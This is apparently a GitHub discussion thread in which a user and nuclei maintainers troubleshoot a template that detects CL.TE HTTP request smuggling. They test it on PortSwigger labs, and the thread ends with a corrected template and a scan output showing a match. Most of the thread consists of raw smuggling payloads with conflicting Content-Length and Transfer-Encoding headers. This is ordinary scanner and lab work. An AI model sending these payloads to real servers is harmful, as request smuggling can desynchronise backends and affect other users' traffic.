Find 2 words in 2 request #7890
-
I want to create a 'nuclei template' to find words but I have problem with it |
Beta Was this translation helpful? Give feedback.
Replies: 11 comments 4 replies
-
@Rawezho1o you can do it using dsl matcher: matchers:
- type: dsl
dsl:
- status_code_1 == 200
- status_code_2 == 404
condition: and See the docs - https://nuclei.projectdiscovery.io/templating-guide/protocols/http/#request-condition |
Beta Was this translation helpful? Give feedback.
-
hi @ehsandeep ok but I want the responses to be different. I don't care how much the response is. For example, 302, 200 or 400, 301 or 404, 200. In your code, the first response is 200 and the second response is |
Beta Was this translation helpful? Give feedback.
-
Hello, @ehsandeep I have been waiting for an answer for a long time but my question has not been answered yet. Please can you answer |
Beta Was this translation helpful? Give feedback.
-
@Rawezho1o see example https://templates.nuclei.sh/@sandeep/aKqFAcCMsHoA9zYb7qEip7 |
Beta Was this translation helpful? Give feedback.
-
hi @ehsandeep in is not working I tested in portswigger lab You can see my template here: id: CL-TE-http-smuggling
info:
name: HTTP request smuggling, basic CL.TE vulnerability
author: pdteam
severity: high
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
- raw:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
unsafe: true
matchers:
- type: dsl
dsl:
- status_code_1 != status_code_2 |
Beta Was this translation helpful? Give feedback.
-
To compare two or multiple request, all request has to be in same request block, i.e under same id: CL-TE-http-smuggling
info:
name: HTTP request smuggling, basic CL.TE vulnerability
author: pdteam
severity: high
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
- |+
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
unsafe: true
matchers:
- type: dsl
dsl:
- status_code_1 != status_code_2 |
Beta Was this translation helpful? Give feedback.
-
Hi @ehsandeep thanks for answer but it is now work I test it on interminal and https://templates.nuclei.sh but not work |
Beta Was this translation helpful? Give feedback.
-
and I got this error: |
Beta Was this translation helpful? Give feedback.
-
hello @MetzinAround I test it in there because I can get 2 different in 2 request anyway all lab on portswigger work for only few minutes if you want to access that lab go to https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses and click "access the lab" button |
Beta Was this translation helpful? Give feedback.
-
Hello, @ehsandeep @MetzinAround I have been waiting for an answer for a long time but my question has not been answered yet. Please can you answer |
Beta Was this translation helpful? Give feedback.
-
@Rawezho1o , i tried the template on burpsuite lab you shared and it returned me
and lab goal is to get a 404 response on next subsequent request to Corrected templateid: CL-TE-http-smuggling
info:
name: HTTP request smuggling, basic CL.TE vulnerability
author: pdteam
severity: high
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
unsafe: true
matchers:
- type: dsl
dsl:
- status_code_1 != status_code_2
- status_code_2 == 404
condition: and nuclei -u https://0ac300b2039ada798213420300320068.web-security-academy.net -t example.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.0-dev
projectdiscovery.io
[INF] Current nuclei version: v3.0.0-dev (development)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[CL-TE-http-smuggling] [http] [high] https://0ac300b2039ada798213420300320068.web-security-academy.net/
|
Beta Was this translation helpful? Give feedback.
@Rawezho1o , i tried the template on burpsuite lab you shared and it returned me
and lab goal is to get a 404 response on next subsequent request to
POST
notGET
, in your template you are sendingGET
request templateCorrected template
…